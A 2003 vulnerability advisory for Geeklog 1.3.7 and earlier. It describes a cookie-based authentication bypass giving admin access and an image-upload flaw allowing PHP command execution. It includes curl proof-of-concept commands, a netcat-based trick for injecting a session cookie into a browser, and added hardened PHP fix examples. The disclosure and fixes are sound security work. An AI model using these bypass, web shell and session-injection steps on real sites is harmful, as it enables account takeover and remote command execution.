geeklog.txt

Posted May 30, 2003
Authored by Pokleyzz | Site scan-associates.net

Geeklog version 1.3.7ar1 and below is susceptible to multiple vulnerabilities. A SQL integer manipulation flaw in the authentication script allows a remote attacker to gain administrative access, and a lack of error checking when images are uploaded allows an attacker to upload files containing PHP code that can be used to execute arbitrary commands as the apache user on the remote server.

tags | exploit, remote, php, vulnerability
SHA-256 | b929f64a82369714c4e73c1aa6713942f4e3fa31bd56ba1f5265811388f21c2b

Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.

Description
===========
Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your
own virtual community area, complete with user administration, story posting,
messaging, comments, polls, calendar, weblinks, and more! It can run on many
different operating systems, and uses PHP4 and MySQL.

Details
=======
i) SQL integer manipulation in the authentication script.

from lib-sessions.php line 128 ------------------------------------------------

if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
    // Session cookie doesn't exist but a permanent cookie does.
    // Start a new session cookie;
    if ($_SESS_VERBOSE) {
        COM_errorLog('perm cookie found from lib-common.php',1);
    }

    $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
    $cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

    //echo $userid;

    // $userid is interpolated into the WHERE clause without validation;
    // a uid that matches no row yields a NULL $userpass here.
    $userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

    if ($cookie_password <> $userpass) {
        // User could have modified UID in cookie, don't do shit

    } else {
        if ($userid) {
            $user_logged_in = 1;
            //echo $userid;
            // Create new session and write cookie
            $sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
            SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_session'], $_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
            $userdata = SESS_getUserDataFromId($userid);
            $_USER = $userdata;
        }
    }
}

------------------------------------------------------------------------

In this case:
DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
"SELECT passwd FROM $_TABLES['users'] WHERE uid=$userid"

When we supply a non-existent user, we can bypass the ($cookie_password <> $userpass)
check because both $userpass and $cookie_password will be null.

example:
curl -b geeklog=9999 http://blablaba/users.php

SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
will execute the SQL query
"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')"

A valid session for user 9999, which does not exist, is inserted into the database.

Integer manipulation to get admin access
----------------------------------------
By supplying a floating point number as the userid, a user can easily log in as any Geeklog
user. This is because the userid is an integer value in the database, and a floating point
number always gives a null value for $userpass (non-existent user), while 2.1 is inserted
as 2 into a column with an integer data type.

proof of concept:
curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

header.txt will contain a valid session for admin.
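As an added example (not Geeklog's code), the permanent-cookie check from lib-sessions.php rewritten so that both flaws above are closed: the uid is accepted only as a canonical integer string (so "9999" for a missing user and "2.1" are both handled safely), the lookup is a prepared statement, and a missing or empty stored password is rejected before any comparison. It assumes a PDO handle $db and a trusted, configuration-supplied users table name with columns uid and passwd.

```php
<?php
// Added example, not Geeklog's code. Assumes: $db is a PDO connection,
// $usersTable comes from trusted configuration (it is interpolated into the
// SQL), and the cookie carries the stored passwd value as the original did.
function lookupUserFromPermanentCookie(PDO $db, string $usersTable,
                                       $cookieUid, $cookiePassword): ?int
{
    // Accept only a canonical decimal integer string. This rejects "2.1",
    // non-numeric text and leading zeros, so MySQL never has to coerce the
    // value (2.1 -> 2) and the WHERE clause only ever sees a real uid.
    if (!is_string($cookieUid) || !ctype_digit($cookieUid)
        || $cookieUid !== (string) (int) $cookieUid || (int) $cookieUid <= 0) {
        return null;
    }
    // An empty cookie password must never be allowed to equal a NULL or
    // empty passwd column, which is what the original <> check permitted.
    if (!is_string($cookiePassword) || $cookiePassword === '') {
        return null;
    }

    // Bind the uid as an integer instead of interpolating it into the query.
    $stmt = $db->prepare("SELECT passwd FROM {$usersTable} WHERE uid = :uid");
    $stmt->bindValue(':uid', (int) $cookieUid, PDO::PARAM_INT);
    $stmt->execute();
    $stored = $stmt->fetchColumn();

    // fetchColumn() returns false when no row matched. The original code let
    // that collapse into NULL and then compared NULL with NULL successfully;
    // here a missing user is rejected before any comparison happens, so no
    // session row for a non-existent uid can be created.
    if ($stored === false || $stored === null || $stored === '') {
        return null;
    }
    // Strict, constant-time comparison instead of the loose <> operator.
    if (!hash_equals((string) $stored, $cookiePassword)) {
        return null;
    }
    return (int) $cookieUid;
}
```

A caller creates a session only when this returns a uid; a null result means the cookie is treated as absent.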


ii) Upload image with any extension.

There is a lack of error checking in the image upload scripts, where a user can upload a valid
image with any extension (users and stories modules). The user-supplied extension is used as
the image's extension. By embedding PHP code in the image, a user can execute any command as the
apache user on the remote server.

proof of concept:
i) Upload the attached file to the server using "Internet Explorer". "Internet Explorer"
will use the file header to generate the mime-type for the uploaded file.
ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php
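As an added example (not Geeklog's code), an upload handler for the issue above that derives the stored extension from the decoded image header and a server-generated name, so neither the client-supplied filename nor its MIME type can choose a .php extension. It assumes PHP 7 or later, $tmpPath is the temporary file of an HTTP upload, and $destDir is a directory configured so the web server does not execute scripts from it.

```php
<?php
// Added example, not Geeklog's code. Assumes PHP >= 7 (random_bytes) and that
// $destDir is served as static files only (no PHP handler for that path).
function storeUploadedImage(string $tmpPath, string $destDir): ?string
{
    // The only types accepted, keyed by the decoded IMAGETYPE_* code; the
    // client's filename and Content-Type are never consulted.
    $allowed = [
        IMAGETYPE_GIF  => 'gif',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
    ];
    // getimagesize() parses the file header itself and returns the
    // IMAGETYPE_* code at index 2, or false for data it cannot decode.
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    // Server-generated name: no user input reaches the path or the extension,
    // so "photo.php" or "photo.gif.php" cannot land under the web root.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $dest = rtrim($destDir, '/') . '/' . $name;

    // move_uploaded_file() refuses any file that was not an HTTP upload.
    if (!move_uploaded_file($tmpPath, $dest)) {
        return null;
    }
    chmod($dest, 0644); // plain data, not executable
    return $name;
}
```

A valid image can still carry PHP text in a comment block, so the fixed extension only helps together with an upload directory the server never hands to the PHP interpreter.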


Vendor Response
===============
The vendor was contacted on 19/05/2003 and a fixed version is available at
http://www.geeklog.net


Tips
====
A simple way to trick Mozilla into storing a session from any site.

i) Edit header.txt.

----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT; path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22 GMT; path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


----------------header.txt --------------------------

ii) Serve it with netcat
# nc -l -p 9090 < header.txt

iii) Set your Mozilla HTTP proxy server to 127.0.0.1:9090

iv) Browse to http://blablaba.com/

v) Unset the proxy and browse to http://blablabla.com

